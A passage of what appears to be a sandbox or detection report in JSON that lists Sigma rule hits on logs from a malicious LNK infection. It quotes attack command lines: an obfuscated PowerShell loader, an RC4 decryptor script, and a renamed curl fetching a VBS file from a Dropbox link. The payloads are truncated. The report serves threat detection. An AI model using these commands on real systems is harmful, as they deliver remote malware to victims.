"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "e75e9983c2277304aa1294c0b077a3139a8405cd1661ccf513a6c05a002acacf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Base64 Encoded PowerShell Command Detected",
"rule_description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "SHA1=3D6861E137699ADD6E1DB51E2F9D96A9FC4F122D,MD5=1089F6E6C6C219009F75C637ED302F99,SHA256=5A1D9329C862C908B050896FEFA49628D00A914EE2155CEFCAA7704BD1A5E2C8,IMPHASH=FF24CEF596AA4AA9D65391184A89D008",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoE [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c mode 15,1&for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\*rshell.exe /s /b /od) do call %a $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef [TRUNCATED]",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW [TRUNCATED]",
"Image": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
},
{
"values": {
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\shortcut.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "f4143907bd6e32636e7bc2f3b4f1fca7dde5ff6787f10a17b360a798f52c6357",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Uncommon Svchost Command Line Parameter",
"rule_description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\n",
"rule_author": "Liran Ravich",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\svchost.exe",
"Image": "C:\\Windows\\system32\\svchost.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "fe226328e3589518f77bd1ce4b456e119e55dde2c461f9c95e33b4e2a9f4373d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious LNK Command-Line Padding with Whitespace Characters",
"rule_description": "Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).\nAdversaries insert non-printable whitespace characters (e.g., Line Feed \\x0A, Carriage Return \\x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.\nThe hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion\u2014commonly used for social engineering attacks.\nThis rule flags suspicious use of such padding observed in real-world attacks.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\shortcut.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "0db9fba426142aca003830de31e38a7318ed0a3a299852f6bc4cbe8bc905515f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Read Contents From Stdin Via Cmd.EXE",
"rule_description": "Detects the use of \"<\" (stdin redirection) to read and potentially execute a file via cmd.exe. The operator may also appear inside a quoted or obfuscated argument string rather than as a real redirection, as in the matched command lines below, so confirm an actual input file is referenced before treating this as standalone evidence.",
"rule_author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c mode 15,1&for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\*rshell.exe /s /b /od) do call %a $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef [TRUNCATED]",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\shortcut.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "253df726683ee378cff180cb32526ec9f10b897edda084113b11cbeba118fbe3",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Copy From Or To Admin Share Or Sysvol Folder",
"rule_description": "Detects a copy command or a copy utility execution to or from an Admin share or a remote SYSVOL folder",
"rule_author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c mode 15,1&for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\*rshell.exe /s /b /od) do call %a $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef [TRUNCATED]",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6291f85314c7d9966be831c56d3cdfb30f42c84f599273e73dac5c95e1122abf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs",
"rule_author": "James Pemberton / @4A616D6573",
"match_context": [
{
"values": {
"ScriptBlockText": "Add-type -Assembly System.Drawing\r\nAdd-Type -Assembly System.Windows.Forms\r\nAdd-Type -Assembly PresentationCore\r\nAdd-Type -AssemblyName System.Windows.Forms\r\nAdd-type -AssemblyName System.Drawing\r\nAdd-Type -TypeDefinition @\"\r\n#pragma warning disable 0675\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\nnamespace BrainS\r\n{\r\n public class RC4EncDec\r\n {\r\n private static int nBlockLength = 256;\r\n private rea [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "a1694413-aae2-452e-af1c-4bddd73debd5",
"Path": "C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "77ecce5ea77940e3b7b82f2766d696c4bf16f75a458c3ddfe650f26d4475fa74",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Insecure Transfer Via Curl.EXE",
"rule_description": "Detects execution of \"curl.exe\" with the \"--insecure\" flag (or its short form \"-k\"), which disables TLS certificate verification for the transfer.",
"rule_author": "X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7est=ip1rnvm2dl=0\" ",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\TMP0392.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Hashes": "MD5=4329254E74AD91D047E3CEDCC7C138C3,SHA256=126217CB9E37D9CF3B254E13A4E2B257FFFFAE54728892D00E868D56DE726071,IMPHASH=1FAE21CBD5A980A07170C74DE0A3B416",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7est=ip1rnvm2dl=0\" ",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\TMP0392.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "a5f575ade1f2aaba452086d3418d8a893e94b28e30da42ad98b58df4a4fe9c2d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential Suspicious PowerShell Keywords",
"rule_description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework",
"rule_author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)",
"match_context": [
{
"values": {
"ScriptBlockText": "Add-type -Assembly System.Drawing\r\nAdd-Type -Assembly System.Windows.Forms\r\nAdd-Type -Assembly PresentationCore\r\nAdd-Type -AssemblyName System.Windows.Forms\r\nAdd-type -AssemblyName System.Drawing\r\nAdd-Type -TypeDefinition @\"\r\n#pragma warning disable 0675\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\nnamespace BrainS\r\n{\r\n public class RC4EncDec\r\n {\r\n private static int nBlockLength = 256;\r\n private rea [TRUNCATED]",
"Path": "C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"ScriptBlockId": "a1694413-aae2-452e-af1c-4bddd73debd5",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "c50af4c9fd0606d73bbfb8615f9f4e6ead04b5e20ce70f292af065c18f9e63c4",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Usage of For Loop with Recursive Directory Search in CMD",
"rule_description": "Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing.\nThis pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection.\nThis behavior has been observed in various malicious lnk files.\n",
"rule_author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
"match_context": [
{
"values": {
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "SHA1=1632C362E1370B79DA529639F63846D50076FD4B,MD5=C30B7264418F9EBE7AE7D8159A894E5E,SHA256=6BD8DF16A6500E279F570E2986D26AD769499933BA2A8911FCF9444A01D3FF30,IMPHASH=2F60C2ED7648C832822B0B1EE9787340",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "MODE.COM",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "DOS Device MODE Utility",
"FileVersion": "10.0.22621.1 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "mode 15,1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\mode.com",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"Description": "Windows Command Processor",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "SHA1=3D6861E137699ADD6E1DB51E2F9D96A9FC4F122D,MD5=1089F6E6C6C219009F75C637ED302F99,SHA256=5A1D9329C862C908B050896FEFA49628D00A914EE2155CEFCAA7704BD1A5E2C8,IMPHASH=FF24CEF596AA4AA9D65391184A89D008",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoE [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
